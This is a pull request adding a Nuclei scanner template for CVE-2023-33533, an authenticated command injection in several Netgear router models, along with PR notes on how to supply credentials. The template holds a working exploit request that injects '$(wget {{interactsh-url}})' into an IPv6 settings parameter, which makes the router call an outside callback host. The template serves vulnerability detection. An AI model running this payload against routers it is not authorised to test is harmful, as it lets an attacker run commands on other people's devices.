### PR TITLE
Added CVE-2023-33533 template

### DIFF
--- a/http/cves/2023/CVE-2023-33533.yaml
+++ b/http/cves/2023/CVE-2023-33533.yaml
@@ -1,0 +1,65 @@
+id: cve-2023-33533
+
+info:
+  name: Netgear D6220/D8500/R6700/R6900 Authenticated Command Injection
+  author: CodeStuffBreakThings
+  severity: critical
+  description: Netgear D6220 with Firmware Version 1.0.0.80, D8500 with Firmware Version 1.0.3.60, R6700 with Firmware Version 1.0.2.26, and R6900 with Firmware Version 1.0.2.26 are vulnerable to Command Injection. If an attacker gains web management privileges, they can inject commands into the post request parameters, gaining shell privileges.
+  remediation: Upgrade to a newer firmware version. Replace the router if it is end-of-life.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-33533
+    - https://github.com/D2y6p/CVE/blob/main/Netgear/CVE-2023-33533/Exp.py
+    - https://github.com/D2y6p/CVE/blob/main/Netgear/CVE-2023-33533/Netgear_RCE.pdf
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2023-33533
+    cwe-id: CWE-77
+  tags: cve2023,cve,netgear,router,rce,oast,authenticated
+
+http:
+  - raw:
+      - |
+        GET /IPV6_fixed.htm HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Basic Zm9vOmRlZmF1bHQK
+        Referer: http://{{Host}}/IPV6_disable.htm
+        XSRF_TOKEN: 2267229739
+
+      - |
+        GET /IPV6_fixed.htm HTTP/1.1
+        Host: {{Hostname}}
+        Referer: http://{{Host}}/IPV6_disable.htm
+        XSRF_TOKEN: {{xsrf_token}}
+
+      - |
+        POST /ipv6_fix.cgi?id={{csrf_id}} HTTP/1.1
+        Host: {{Hostname}}
+        Referer: http://{{Host}}/IPV6_disable.htm
+        XSRF_TOKEN: {{xsrf_token}}
+        Content-Type: text/plain
+
+        apply=Apply&login_type=Fixed&IPv6WanAddr1=2001&IPv6WanAddr2=3CA2&IPv6WanAddr3=010F&IPv6WanAddr4=00A1&IPv6WanAddr5=121C&IPv6WanAddr6=0000&IPv6WanAddr7=0000&IPv6WanAddr8=0010&ProfixWanLength=6&IPv6Gateway1=2001&IPv6Gateway2=3CA2&IPv6Gateway3=010F&IPv6Gateway4=00A1&IPv6Gateway5=121C&IPv6Gateway6=0000&IPv6Gateway7=0000&IPv6Gateway8=0002&DAddr1=&DAddr2=&DAddr3=&DAddr4=&DAddr5=&DAddr6=&DAddr7=&DAddr8=&PDAddr1=&PDAddr2=&PDAddr3=&PDAddr4=&PDAddr5=&PDAddr6=&PDAddr7=&PDAddr8=&IpAssign=auto&IPv6LanAddr1=3113&IPv6LanAddr2=3CA2&IPv6LanAddr3=010F&IPv6LanAddr4=001A&IPv6LanAddr5=121B&IPv6LanAddr6=0000&IPv6LanAddr7=0000&IPv6LanAddr8=0001&ProfixLanLength=6&ipv6_wan_ipaddr=$(wget {{interactsh-url}})&ipv6_lan_ipaddr=3113%3A3CA2%3A010F%3A001A%3A121B%3A0000%3A0000%3A0001&ipv6_wan_length=6&ipv6_lan_length=6&ipv6_pri_dns=%3A%3A%3A%3A%3A%3A%3A&ipv6_sec_dns=%3A%3A%3A%3A%3A%3A%3A&ipv6_wan_gateway=aaa&ipv6_enable_dhcp=&ipv6_proto=fixed
+
+    extractors:
+      - type: regex
+        name: xsrf_token
+        group: 1
+        part: header
+        regex:
+          - 'Set-Cookie: XSRF_TOKEN=(.*?);'
+        internal: true
+
+      - type: regex
+        name: csrf_id
+        group: 1
+        part: body
+        regex:
+          - 'cgi\?id=([\w\d]+)'
+        internal: true
+
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - http

--- a/http/cves/2023/CVE-2023-33533.yaml
+++ b/http/cves/2023/CVE-2023-33533.yaml
@@ -3,7 +3,7 @@ id: cve-2023-33533
 info:
   name: Netgear D6220/D8500/R6700/R6900 Authenticated Command Injection
   author: CodeStuffBreakThings
-  severity: critical
+  severity: high
   description: Netgear D6220 with Firmware Version 1.0.0.80, D8500 with Firmware Version 1.0.3.60, R6700 with Firmware Version 1.0.2.26, and R6900 with Firmware Version 1.0.2.26 are vulnerable to Command Injection. If an attacker gains web management privileges, they can inject commands into the post request parameters, gaining shell privileges.
   remediation: Upgrade to a newer firmware version. Replace the router if it is end-of-life.
   reference:


### PR DESCRIPTION
### Template / PR Information

Added CVE-2023-33533 for #8164

### References
- https://nvd.nist.gov/vuln/detail/CVE-2023-33533
- https://github.com/D2y6p/CVE/blob/main/Netgear/CVE-2023-33533/Exp.py
- https://github.com/D2y6p/CVE/blob/main/Netgear/CVE-2023-33533/Netgear_RCE.pdf

### Template Validation

I've validated this template locally?
- [X] YES
- [ ] NO


#### Additional Details

Since this vulnerability requires authentication, a [Secret File](https://docs.projectdiscovery.io/tools/nuclei/authenticated-scans) will need to be used that contains the basic auth credentials for the router admin panel.
Example:
```yaml
static:
  - type: basicauth
    domains:
      - routerlogin.net
      - 192.168.1.1
    username: admin
    password: Qwerty123
```

Due to the time it can take for the IPv6 settings to apply when exploiting this vulnerability, repeated attempts to run the template may lead to the exploit not being ran for up to several minutes.

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)